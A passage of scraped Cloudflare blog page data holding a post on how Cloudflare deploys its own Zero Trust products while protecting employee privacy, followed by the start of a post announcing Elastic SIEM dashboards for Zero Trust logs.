environments."],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/rRHcYjhzLRpVjXkZFN1EV/bc997684906e057941b81555abccb11c/introducing-magic-cloud-networking-KTXbI4.png"]}]}],[0,{"id":[0,"6l7ydA66mxLvZMpnAgzEhD"],"title":[0,"Securing Cloudflare with Cloudflare: a Zero Trust journey"],"slug":[0,"securing-cloudflare-with-cloudflare-zero-trust"],"excerpt":[0,"A deep dive into how we have deployed Zero Trust at Cloudflare while maintaining user privacy"],"featured":[0,false],"html":[0,"<p></p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4r1CIssX038rlnrx4n00m8/5893d5cb949bc417ad6eb899c88ebb75/image1-8.png\" alt=\"Securing Cloudflare with Cloudflare: a Zero Trust journey\" class=\"kg-image\" width=\"1800\" height=\"1013\" loading=\"lazy\"/>\n \n </figure><p>Cloudflare is committed to providing our customers with industry-leading <a href=\"https://www.cloudflare.com/network-security/\">network security solutions</a>. At the same time, we recognize that establishing robust security measures involves identifying potential threats by using processes that may involve scrutinizing sensitive or personal data, which in turn can pose a risk to privacy. As a result, we work hard to balance privacy and security by building privacy-first security solutions that we offer to our customers and use for our own network.</p><p>In this post, we&#39;ll walk through how we deployed Cloudflare products like Access and our Zero Trust Agent in a privacy-focused way for employees who use the Cloudflare network. Even though global legal regimes generally afford employees a lower level of privacy protection on corporate networks, we work hard to make sure our employees understand their privacy choices because Cloudflare has a strong culture and history of respecting and furthering user privacy on the Internet. We’ve found that many of our customers feel similarly about ensuring that they are protecting privacy while also securing their networks.</p><p>So how do we balance our commitment to privacy with ensuring the security of our internal corporate environment using Cloudflare products and services? We start with the basics: We only retain the minimum amount of data needed, we de-identify personal data where we can, we communicate transparently with employees about the security measures we have in place on corporate systems and their privacy choices, and we retain necessary information for the shortest time period needed.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"how-we-secure-cloudflare-using-cloudflare\">How we secure Cloudflare using Cloudflare</h2>\n <a href=\"#how-we-secure-cloudflare-using-cloudflare\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>We take a comprehensive approach to securing our globally distributed hybrid workforce with both organizational controls and technological solutions. Our organizational approach includes a number of measures, such as a company-wide Acceptable Use Policy, employee privacy notices tailored by jurisdiction, required annual and new-hire privacy and security trainings, role-based access controls (<a href=\"https://www.cloudflare.com/learning/access-management/role-based-access-control-rbac/\">RBAC</a>), and least privilege principles. These organizational controls allow us to communicate expectations for both the company and the employees that we can implement with technological controls and that we enforce through logging and other mechanisms.</p><p>Our technological controls are rooted in <a href=\"https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/\">Zero Trust best practices</a> and start with a focus on our Cloudflare One services to secure our workforce as described below.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"securing-access-to-applications\">Securing access to applications</h3>\n <a href=\"#securing-access-to-applications\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Cloudflare <a href=\"https://www.cloudflare.com/application-services/solutions/\">secures access to self-hosted and SaaS applications</a> for our workforce, whether remote or in-office, using our own <a href=\"https://www.cloudflare.com/learning/access-management/what-is-ztna/\">Zero Trust Network Access</a> (ZTNA) service, Cloudflare Access, to verify identity, <a href=\"/how-cloudflare-implemented-fido2-and-zero-trust/\">enforce multi-factor authentication with security keys</a>, and evaluate device posture using the Zero Trust client for every request. This approach evolved over several years and has enabled Cloudflare to more effectively protect our growing workforce.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"defending-against-cyber-threats\">Defending against cyber threats</h3>\n <a href=\"#defending-against-cyber-threats\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Cloudflare leverages <a href=\"https://www.cloudflare.com/network-services/products/magic-wan/\">Cloudflare Magic WAN</a> to secure our office networks and <a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/warp/\">the Cloudflare Zero Trust agent</a> to secure our workforce. We use both of these technologies as an onramp to our own <a href=\"https://www.cloudflare.com/zero-trust/products/gateway/\">Secure Web Gateway (also known as Gateway)</a> to secure our workforce from a rise in online threats.</p><p>As we have evolved our hybrid work and office configurations, our security teams have benefited from additional controls and visibility for forward-proxied Internet traffic, including:</p><ul><li><p><b>Granular HTTP controls</b>: Our security teams <a href=\"https://www.cloudflare.com/learning/security/what-is-https-inspection/\">inspect HTTPS traffic</a> to block access to specific websites identified as malicious by our security team, conduct <a href=\"https://developers.cloudflare.com/cloudflare-one/policies/gateway/http-policies/antivirus-scanning/\">antivirus scanning</a>, and apply identity-aware browsing policies.</p></li><li><p><b>Selectively isolating Internet browsing</b>: With <a href=\"https://www.cloudflare.com/learning/access-management/what-is-browser-isolation/\">remote browser isolated (RBI)</a> sessions, all web code is run on Cloudflare’s network far from local devices, insulating users from any untrusted and malicious content. Today, Cloudflare isolates social media, news outlets, personal email, and other potentially risky Internet categories, and we have set up feedback loops for our employees to help us fine-tune these categories.</p></li><li><p><b>Geography-based logging</b>: Seeing where outbound requests originate helps our security teams understand the geographic distribution of our workforce, including our presence in high-risk areas.</p></li><li><p><b>Data Loss Prevention:</b> To keep sensitive data inside our corporate network, this tool allows us to identify data we’ve flagged as sensitive in outbound HTTP/S traffic and prevent it from leaving the network.</p></li><li><p><b>Cloud Access Security Broker:</b> This tool allows us to monitor our SaaS apps for misconfigurations and sensitive data that is potentially exposed or shared too broadly.</p></li></ul>\n <div class=\"flex anchor relative\">\n <h3 id=\"protecting-inboxes-with-cloud-email-security\">Protecting inboxes with cloud email security</h3>\n <a href=\"#protecting-inboxes-with-cloud-email-security\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Additionally, we have deployed our <a href=\"https://www.cloudflare.com/zero-trust/products/email-security/\">Cloud Email Security</a> solution to protect our workforce from increased phishing and <a href=\"https://www.cloudflare.com/learning/email-security/business-email-compromise-bec/\">business email compromise</a> attacks that we have not only seen directed against our employees, but that are <a href=\"/2023-phishing-report\">plaguing organizations globally</a>. One key feature we use is <a href=\"/safe-email-links/\">email link isolation</a>, which uses RBI and email security functionality to open potentially suspicious links in an isolated browser. This allows us to be slightly more relaxed with blocking suspicious links without compromising security. This is a big win for productivity for our employees and the security team, as both sets of employees aren’t having to deal with large volumes of false positives.</p><p>More details on our implementation can be found in our <a href=\"https://www.cloudflare.com/case-studies/cloudflare-one/\">Securing Cloudflare with Cloudflare One</a> case study.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"how-we-respect-privacy\">How we respect privacy</h2>\n <a href=\"#how-we-respect-privacy\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>The very nature of these powerful security technologies Cloudflare has created and deployed underscores the responsibility we have to use privacy-first principles in handling this data, and to recognize that the data should be respected and protected at all times.</p><p>The journey to respecting privacy starts with the products themselves. We develop products that have privacy controls built in at their foundation. To achieve this, our product teams work closely with Cloudflare’s product and privacy counsels to practice privacy by design. A great example of this collaboration is the ability to manage personally identifiable information (PII) in the Secure Web Gateway logs. You can choose to <a href=\"https://developers.cloudflare.com/cloudflare-one/insights/logs/gateway-logs/manage-pii/#exclude-pii\">exclude PII from Gateway logs</a> entirely or <a href=\"https://developers.cloudflare.com/cloudflare-one/insights/logs/gateway-logs/manage-pii/#redact-pii\">redact PII from the logs</a> and gain granular control over access to PII with the <a href=\"https://developers.cloudflare.com/cloudflare-one/roles-permissions/#cloudflare-zero-trust-pii\">Zero Trust PII Role</a>.</p><p>In addition to building privacy-first security products, we are also committed to communicating transparently with Cloudflare employees about how these security products work and what they can – and can’t – see about traffic on our internal systems. This empowers employees to see themselves as part of the security solution, rather than set up an “us vs. them” mentality around employee use of company systems.</p><p>For example, while our employee privacy policies and our Acceptable Use Policy provide broad notice to our employees about what happens to data when they use the company’s systems, we thought it was important to provide even more detail. As a result, our security team collaborated with our privacy team to create an internal wiki page that plainly explains the data our security tools collect and why. We also describe the privacy choices available to our employees. This is particularly important for the “bring your own device” (BYOD) employees who have opted for the convenience of using their personal mobile device for work. BYOD employees must install endpoint management (provided by a third party) and Cloudflare’s Zero trust client on their devices if they want to access Cloudflare systems. We described clearly to our employees what this means about what traffic on their devices can be seen by Cloudflare teams, and we explained how they can take steps to protect their privacy when they are using their devices for purely personal purposes.</p><p>For the teams that develop for and support our <a href=\"https://www.cloudflare.com/zero-trust/solutions/\">Zero Trust services</a>, we ensure that data is available only on a strict, need-to-know basis and is restricted to Cloudflare team members that require access as an essential part of their job. The set of people with access are required to take training that reminds them of their responsibility to respect this data and provides them with best practices for handling sensitive data. Additionally, to ensure we have full auditability, we log all the queries run against this database and by whom they are run.</p><p>Cloudflare has also made it easy for our employees to express any concerns they may have about how their data is handled or what it is used for. We have mechanisms in place that allow employees to ask questions or express concerns about the use of Zero Trust Security on Cloudflare’s network.</p><p>In addition, we make it easy for employees to reach out directly to the leaders responsible for these tools. All of these efforts have helped our employees better understand what information we collect and why. This has helped to expand our strong foundation for security and privacy at Cloudflare.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"encouraging-privacy-first-security-for-all\">Encouraging privacy-first security for all</h2>\n <a href=\"#encouraging-privacy-first-security-for-all\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>We believe firmly that great security is critical for ensuring data privacy, and that privacy and security can co-exist harmoniously. We also know that it is possible to secure a corporate network in a way that respects the employees using those systems.</p><p>For anyone looking to secure a corporate network, we encourage focusing on network security products and solutions that build in personal data protections, like our Zero Trust suite of products. If you are curious to explore <a href=\"https://www.cloudflare.com/learning/access-management/how-to-implement-zero-trust/\">how to implement</a> these Cloudflare services in your own organizations, <a href=\"https://www.cloudflare.com/products/zero-trust/plans/enterprise/\">request a consultation on Zero Trust here</a>.</p><p>We also urge organizations to make sure they communicate clearly with their users. In addition to making sure company policies are transparent and accessible, it is important to help employees understand their privacy choices. Under the laws of almost every jurisdiction globally, individuals have a lower level of privacy on a company device or a company’s systems than they do on their own personal accounts or devices, so it’s important to communicate clearly to help employees understand the difference. If an organization has privacy champions, works councils, or other employee representation groups, it is critical to communicate early and often with these groups to help employees understand what controls they can exercise over their data.</p>"],"published_at":[0,"2024-03-05T14:00:51.000+00:00"],"updated_at":[0,"2024-10-09T23:27:18.052Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/wmNG9lzdtOxqdp7KP7LUU/55d242c7e61be59edd77bc96e73e0bd8/securing-cloudflare-with-cloudflare-zero-trust.png"],"tags":[1,[[0,{"id":[0,"3DmitkNK6euuD5BlhuvOLW"],"name":[0,"Security Week"],"slug":[0,"security-week"]}],[0,{"id":[0,"7aSCe0ZArYqX0ThFK2gRm0"],"name":[0,"API Gateway"],"slug":[0,"api-gateway"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}],[0,{"id":[0,"3BWeMuiOShelE7QM48sW9j"],"name":[0,"Privacy"],"slug":[0,"privacy"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Derek Pitts"],"slug":[0,"derek-pitts"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3XEk6jZ0NrB9sP12j9nLRn/df0b49aa85e21803930517523bc87df6/derek-pitts.png"],"location":[0,null],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}],[0,{"name":[0,"Ankur Aggarwal"],"slug":[0,"ankur"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5jlZmfW8yTju4mM7ILqZTR/3adcdef58140a276c6586f81e4fdbecc/ankur.jpeg"],"location":[0,null],"website":[0,null],"twitter":[0,"@Encore_Encore"],"facebook":[0,null]}],[0,{"name":[0,"Emily Hancock"],"slug":[0,"emily-hancock"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6WoITZeDW2tg5JO91UOF0Y/0510a8ee70b2daeb2cb325aa6f8e0ceb/emily-hancock.jpg"],"location":[0,null],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}]]],"meta_description":[0,"A deep dive into how we have deployed Zero Trust at Cloudflare while maintaining user privacy."],"primary_author":[0,{}],"localeList":[0,{"name":[0,"Securing Cloudflare with Cloudflare: a Zero Trust journey Config"],"enUS":[0,"English for Locale"],"zhCN":[0,"Translated for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"Translated for Locale"],"frFR":[0,"No Page for Locale"],"deDE":[0,"No Page for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"Translated for Locale"],"koKR":[0,"Translated for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"No Page for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/securing-cloudflare-with-cloudflare-zero-trust"],"metadata":[0,{"title":[0,"Securing Cloudflare with Cloudflare: a Zero Trust journey"],"description":[0,"A deep dive into how we have deployed Zero Trust at Cloudflare while maintaining user privacy."],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2GIdJuhbXHLSZaIfUm0HHn/e09041c3559cffc18021afd5847684a4/securing-cloudflare-with-cloudflare-zero-trust-n1EWGV.png"]}]}],[0,{"id":[0,"6amHiWxrNpxWRyQhTWFUSu"],"title":[0,"Enhancing security analysis with Cloudflare Zero Trust logs and Elastic SIEM"],"slug":[0,"enhancing-security-analysis-with-cloudflare-zero-trust-logs-and-elastic-siem"],"excerpt":[0,"Today, we are thrilled to announce new Cloudflare Zero Trust dashboards on Elastic. Shared customers using Elastic can now use these pre-built dashboards to store, search, and analyze their Zero Trust logs"],"featured":[0,false],"html":[0,"<p></p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/696ov5uPtgNwN7Qm735ESm/6f88ef27e4cacb8057d6e600fd20d378/image3-7.png\" alt=\"Enhancing security analysis with Cloudflare Zero Trust logs and Elastic SIEM\" class=\"kg-image\" width=\"1999\" height=\"1125\" loading=\"lazy\"/>\n \n </figure><p>Today, we are thrilled to announce new Cloudflare Zero Trust dashboards on Elastic. Shared customers using Elastic can now use these pre-built <a href=\"https://docs.elastic.co/integrations/cloudflare_logpush#zero-trust-events\">dashboards to store, search, and analyze</a> their Zero Trust logs.</p><p>When organizations look to adopt a <a href=\"https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/\">Zero Trust architecture</a>, there are many components to get right. If products are configured incorrectly, used maliciously, or security is somehow breached during the process, it can open your organization to underlying security risks without the ability to get insight from your data quickly and efficiently.</p><p>As a Cloudflare technology partner, Elastic helps Cloudflare customers find what they need faster, while keeping applications running smoothly and <a href=\"https://www.cloudflare.com/products/zero-trust/threat-defense/\">protecting against cyber threats</a>. “I&#39;m pleased to share our collaboration with Cloudflare, making it even easier to deploy log and analytics dashboards. This partnership combines Elastic&#39;s open approach with Cloudflare&#39;s practical solutions, offering straightforward tools for enterprise search, observability, and security deployment,” explained Mark Dodds, Chief Revenue Officer at Elastic.</p>\n <figure class=\"kg-card kg-image-card kg-width-wide\">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7kDqbu2kQvUL1P47N6aDMY/8dacf9b75432a900b32cb900f080366a/image5-3.png\" alt=\"\" class=\"kg-image\" width=\"1999\" height=\"1152\" loading=\"lazy\"/>\n \n </figure>\n <div class=\"flex anchor relative\">\n <h2 id=\"value-of-zero-trust-logs-in-elastic\">Value of Zero Trust logs in Elastic</h2>\n <a href=\"#value-of-zero-trust-logs-in-elastic\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>With this joint solution, we’ve made it easy for customers to seamlessly forward their Zero Trust logs to Elastic via Logpush jobs. This can be achieved directly via a Restful API or through an intermediary storage solution like AWS S3 or Google Cloud. Additionally, Cloudflare&#39;s integration with Elastic has undergone improvements to encompass all categories of Zero Trust logs generated by Cloudflare.</p><p><b>Here are detailed some highlights of what the integration offers:</b></p><ul><li><p><b>Comprehensive Visibility:</b> Integrating Cloudflare Logpush into Elastic provides organizations with a real-time, comprehensive view of events related to Zero Trust. This enables a detailed understanding of who is accessing resources and applications, from where, and at what times. Enhanced visibility helps detect anomalous behavior and potential security threats more effectively, allowing for early response and mitigation.</p></li><li><p><b>Field Normalization:</b> By unifying data from Zero Trust logs in Elastic, it&#39;s possible to apply consistent field normalization not only for Zero Trust logs but also for other sources. This simplifies the process of search and analysis, as data is presented in a uniform format. Normalization also facilitates the creation of alerts and the identification of patterns of malicious or unusual activity.</p></li><li><p><b>Efficient Search and Analysis:</b> Elastic provides powerful data search and analysis capabilities. Having Zero Trust logs in Elastic enables quick and precise searching for specific information. This is crucial for investigating security incidents, understanding workflows, and making informed decisions.</p></li><li><p><b>Correlation and Threat Detection:</b> By combining Zero Trust data with other security events and data, Elastic enables deeper and more effective correlation. This is essential for detecting threats that might go unnoticed when analyzing each data source separately. Correlation aids in pattern identification and the detection of sophisticated attacks.</p></li><li><p><b>Prebuilt Dashboards:</b> The integration provides out-of-the-box dashboards offering a quick start to visualizing key metrics and patterns. These dashboards help security teams visualize the security landscape in a clear and concise manner. The integration not only provides the advantage of prebuilt dashboards designed for Zero Trust datasets but also empowers users to curate their own visualizations.</p></li></ul>\n <div class=\"flex anchor relative\">\n <h2 id=\"whats-new-on-the-dashboards\">What’s new on the dashboards</h2>\n <a href=\"#whats-new-on-the-dashboards\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>One of the main assets of the integration is the out-of-the-box dashboards tailored specifically for each type of Zero Trust log. Let&#39;s explore some of these dashboards in more detail to find out how they can help us in terms of visibility.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"gateway-http\">Gateway HTTP</h3>\n <a href=\"#gateway-http\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>This dashboard focuses on HTTP traffic and allows for monitoring and analyzing HTTP requests passing through Cloudflare&#39;s <a href=\"https://www.cloudflare.com/zero-trust/products/gateway/\">Secure Web Gateway</a>.</p><p>Here, patterns of traffic can be identified, potential threats detected, and a better understanding gained of how resources are being used within the network.</p>\n <figure class=\"kg-card kg-image-card kg-width-wide\">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2C5VeJ6U4MfZjn7cmHgAPn/0e2600c2f5cfdd83d9f9713d60454cc0/image2-10.png\" alt=\"\" class=\"kg-image\" width=\"1999\" height=\"1068\" loading=\"lazy\"/>\n \n </figure><p>Every visualization in the stage is interactive. Therefore, the whole dashboard adapts to enabled filters, and they can be pinned across dashboards for pivoting. For instance, if clicking on one of the sections of the donut showing the different actions, a filter is automatically applied on that value and the whole dashboard is oriented around it.</p>\n <figure class=\"kg-card kg-image-card kg-width-wide\">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5oHgZ74rXxV1we32WHqsye/ae9d1d99546257b6a6140e0a94947ca8/image1-9.png\" alt=\"\" class=\"kg-image\" width=\"1999\" height=\"1094\" loading=\"lazy\"/>\n \n </figure>\n <div class=\"flex anchor relative\">\n <h3 id=\"casb\">CASB</h3>\n <a href=\"#casb\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Following with a different perspective, the <a href=\"https://www.cloudflare.com/learning/access-management/what-is-a-casb/\">CASB (Cloud Access Security Broker)</a> dashboard provides visibility over cloud applications used by users. Its visualizations are targeted to detect threats effectively, helping in the risk management and regulatory compliance.</p>\n <figure class=\"kg-card kg-image-card kg-width-wide\">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/79LR83kaKlJg7kzZS5ewTq/5e86a9bcf83db0940d14aef082c7fdde/image4-5.png\" alt=\"\" class=\"kg-image\" width=\"1999\" height=\"1079\" loading=\"lazy\"/>\n \n </figure><p>These examples illustrate how dashboards in 